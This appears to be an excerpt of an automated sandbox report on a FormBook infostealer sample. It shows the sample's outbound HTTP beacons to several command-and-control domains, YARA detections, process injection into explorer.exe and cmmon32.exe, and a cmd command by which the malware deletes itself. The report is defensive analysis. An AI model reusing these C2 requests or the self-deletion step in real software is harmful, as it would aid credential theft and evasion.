                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 162
                                                                                                              Connection: close
                                                                                                              Location: https://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              3192.168.2.34974423.227.38.7480C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:57.655556917 CEST3394OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1
                                                                                                              Host: www.goldgrandpa.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:57.730741024 CEST3395INHTTP/1.1 403 Forbidden
                                                                                                              Date: Thu, 10 Jun 2021 12:36:57 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Sorting-Hat-PodId: 170
                                                                                                              X-Sorting-Hat-ShopId: 39696531622
                                                                                                              X-Dc: gcp-europe-west1
                                                                                                              X-Request-ID: b1326e52-2a8e-4175-b0a0-a109297b2ed1
                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              X-Download-Options: noopen
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 0a97860cd800004ec8d8bd6000000001
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 65d2a5f489974ec8-FRA
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30
                                                                                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              4192.168.2.34974762.149.128.4080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:37:18.660567999 CEST3418OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1
                                                                                                              Host: www.goldinsacks.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:37:18.730734110 CEST3420INHTTP/1.1 404 Not Found
                                                                                                              Cache-Control: private
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Server: Microsoft-IIS/8.5
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              Date: Thu, 10 Jun 2021 12:37:18 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 5049
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.2.349749160.153.136.380C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:37:28.964153051 CEST3434OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1
                                                                                                              Host: www.growwithjenn.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:37:29.018930912 CEST3434INHTTP/1.1 400 Bad Request
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.2.34975034.102.136.18080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:37:34.135488033 CEST3435OUTGET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
                                                                                                              Host: www.bring-wellness.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:37:34.273370028 CEST3435INHTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 10 Jun 2021 12:37:34 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "60c03ab8-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: UGGJ4NnzFz.exe PID: 4884 Parent PID: 5660

                                                                                                              General

                                                                                                              Start time:14:35:29
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:223620 bytes
                                                                                                              MD5 hash:B148AE414EB8A1B34A15CDB32C21F9EE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low

                                                                                                              Analysis Process: UGGJ4NnzFz.exe PID: 5520 Parent PID: 4884

                                                                                                              General

                                                                                                              Start time:14:35:30
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Users\user\Desktop\UGGJ4NnzFz.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:223620 bytes
                                                                                                              MD5 hash:B148AE414EB8A1B34A15CDB32C21F9EE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low

                                                                                                              Analysis Process: explorer.exe PID: 3388 Parent PID: 5520

                                                                                                              General

                                                                                                              Start time:14:35:35
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:
                                                                                                              Imagebase:0x7ff714890000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: cmmon32.exe PID: 6512 Parent PID: 3388

                                                                                                              General

                                                                                                              Start time:14:35:56
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Imagebase:0xca0000
                                                                                                              File size:36864 bytes
                                                                                                              MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:moderate

                                                                                                              Analysis Process: cmd.exe PID: 6668 Parent PID: 6512

                                                                                                              General

                                                                                                              Start time:14:36:01
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
                                                                                                              Imagebase:0xbd0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: conhost.exe PID: 6676 Parent PID: 6668

                                                                                                              General

                                                                                                              Start time:14:36:01
                                                                                                              Start date:10/06/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >